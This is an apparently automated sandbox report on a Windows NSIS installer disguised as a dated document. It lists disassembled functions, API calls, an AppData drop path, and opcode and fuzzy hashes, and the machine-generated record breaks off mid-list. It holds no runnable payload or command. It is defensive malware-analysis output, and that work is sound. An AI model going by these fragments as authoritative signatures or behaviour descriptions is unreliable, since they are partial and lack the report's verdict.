                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 765 4015c6-4015da call 402dab call 405ffc 770 401636-401639 765->770 771 4015dc-4015ef call 405f7e 765->771 773 401668-4022fb call 401423 770->773 774 40163b-40165a call 401423 call 406682 SetCurrentDirectoryW 770->774 780 4015f1-4015f4 771->780 781 401609-40160c call 405c30 771->781 788 402c2f-402c3e 773->788 774->788 791 401660-401663 774->791 780->781 782 4015f6-4015fd call 405c4d 780->782 789 401611-401613 781->789 782->781 796 4015ff-401607 call 405bd6 782->796 792 401615-40161a 789->792 793 40162c-401634 789->793 791->788 797 401629 792->797 798 40161c-401627 GetFileAttributesW 792->798 793->770 793->771 796->789 797->793 798->793 798->797
                                                      APIs
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(?,?,00425750,?,00406070,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 0040600A
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                        • Part of subcall function 00405BD6: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405C18
                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151,?,00000000,000000F0), ref: 00401652
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151, xrefs: 00401645
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                      • String ID: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151
                                                      • API String ID: 1892508949-1983529546
                                                      • Opcode ID: aa5dd310b5d70740701a2a3e4b5f3b448a7aae78f9a2a95781e07c92bd5766b4
                                                      • Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
                                                      • Opcode Fuzzy Hash: aa5dd310b5d70740701a2a3e4b5f3b448a7aae78f9a2a95781e07c92bd5766b4
                                                      • Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406059 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 801 406059-406074 call 406682 call 405ffc 806 406076-406078 801->806 807 40607a-406087 call 406930 801->807 808 4060d2-4060d4 806->808 811 406097-40609b 807->811 812 406089-40608f 807->812 814 4060b1-4060ba lstrlenW 811->814 812->806 813 406091-406095 812->813 813->806 813->811 815 4060bc-4060d0 call 405f51 GetFileAttributesW 814->815 816 40609d-4060a4 call 4069df 814->816 815->808 821 4060a6-4060a9 816->821 822 4060ab-4060ac call 405f9d 816->822 821->806 821->822 822->814
                                                      APIs
                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(?,?,00425750,?,00406070,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 0040600A
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                      • lstrlenW.KERNEL32(00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 004060B2
                                                      • GetFileAttributesW.KERNELBASE(00425750,00425750,00425750,00425750,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004060C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                      • String ID: PWB
                                                      • API String ID: 3248276644-4275379341
                                                      • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                      • Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
                                                      • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                      • Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004071D5 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                      • Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
                                                      • Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                      • Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004073D6 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                      • Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
                                                      • Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                      • Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004070EC Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                      • Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
                                                      • Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                      • Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406BF1 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                      • Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
                                                      • Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                      • Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040703F Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                      • Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
                                                      • Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                      • Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040715D Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                      • Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
                                                      • Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                      • Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004070A9 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                      • Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
                                                      • Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                      • Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040347E Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                        • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FilePointer$CountTick
                                                      • String ID:
                                                      • API String ID: 1092082344-0
                                                      • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                      • Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
                                                      • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                      • Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                      • RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Enum$CloseValue
                                                      • String ID:
                                                      • API String ID: 397863658-0
                                                      • Opcode ID: d7c3bcff9e3486ffb53bc3915b5cff87963c4f43fcbf315e35984deb84fc55ed
                                                      • Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
                                                      • Opcode Fuzzy Hash: d7c3bcff9e3486ffb53bc3915b5cff87963c4f43fcbf315e35984deb84fc55ed
                                                      • Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403376 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
